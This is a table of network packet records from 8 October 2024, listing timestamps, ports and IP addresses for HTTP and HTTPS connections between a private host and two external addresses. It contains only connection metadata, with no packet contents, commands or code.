Oct 8, 2024 20:47:32.338911057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338932991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338943005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338965893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.338974953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.338999033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.339009047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.339035034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.339046001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.339080095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.352142096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.352174997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.352206945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.352210999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.352232933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.352243900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.352258921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.352277040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.352308035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.352320910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.352344036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.352358103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.352381945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.352387905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.352415085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.352428913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.352447987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.352456093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.352480888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.352490902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.352514029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.352524042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.352547884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.352556944 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.352581024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.352591038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.352622032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.432218075 CEST	443	49828	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.432297945 CEST	443	49828	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.432426929 CEST	49828	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.432559013 CEST	49828	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.432573080 CEST	443	49828	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.432581902 CEST	49828	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.432586908 CEST	443	49828	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.435509920 CEST	49832	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.435600996 CEST	443	49832	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.435710907 CEST	49832	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.435894012 CEST	49832	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.435930967 CEST	443	49832	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.444518089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.444572926 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.444683075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.444725037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.444772959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.444828033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.444863081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.444895983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.444919109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.444928885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.444941044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.444974899 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.444978952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445029020 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445030928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445064068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445082903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445096016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445106983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445130110 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445138931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445163012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445172071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445194960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445205927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445233107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445238113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445266008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445276022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445300102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445308924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445334911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445348024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445383072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445388079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445415974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445425034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445466995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445513964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445511103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445549011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445558071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445581913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445589066 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445616007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445625067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445647955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445681095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445683002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445694923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445714951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445749044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445761919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445781946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445795059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445813894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445822954 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445847988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445858955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445882082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445894003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445916891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445931911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445952892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.445956945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.445986032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446000099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446022034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446033955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446054935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446058989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446089029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446100950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446122885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446142912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446157932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446190119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446192980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446214914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446234941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446249962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446300983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446301937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446336031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446351051 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446388960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446469069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446508884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446523905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446557999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446602106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446639061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446651936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446687937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446713924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446746111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446762085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446779966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446789026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446813107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446822882 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446846962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446860075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446881056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446902990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446932077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.446957111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.446990013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447022915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447042942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447055101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447058916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447088003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447105885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447137117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447171926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447213888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447226048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447261095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447288990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447335958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447376013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447427034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447436094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447460890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447484970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447494030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447513103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447526932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447542906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447560072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447576046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447592020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447612047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447626114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447659969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447675943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447691917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447705030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447726011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447737932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447758913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447772026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447793961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447825909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447844028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447860003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447869062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447891951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447909117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447925091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447953939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447958946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.447974920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.447990894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448008060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448024035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448040009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448055983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448067904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448088884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448101044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448122025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448138952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448154926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448170900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448188066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448204041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448275089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448297024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448308945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448323011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448342085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448365927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448374987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448391914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448410988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448424101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448446035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448462009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448482037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448491096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448522091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448524952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448555946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448589087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448604107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448620081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448630095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448648930 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448653936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448671103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448687077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448710918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448721886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448730946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448755026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448771000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448788881 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448800087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448822021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448836088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448856115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448867083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448888063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448904037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448924065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448942900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448952913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.448973894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.448999882 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536036015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536071062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536106110 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536117077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536139011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536139965 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536154985 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536179066 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536180973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536231995 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536233902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536273956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536278009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536308050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536319971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536340952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536360025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536374092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536392927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536407948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536423922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536441088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536456108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536473989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536490917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536506891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536521912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536540031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536552906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536587000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536596060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536642075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536648035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536680937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536698103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536714077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536731958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536746979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536763906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536778927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536799908 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536811113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536824942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536844969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536860943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536878109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536895037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536911964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536928892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536946058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536962986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.536981106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.536995888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537014008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537029982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537045956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537059069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537079096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537096024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537112951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537127018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537147999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537163019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537183046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537197113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537216902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537231922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537251949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537265062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537301064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537319899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537350893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537372112 CEST	49755	80	192.168.2.5	95.164.90.97
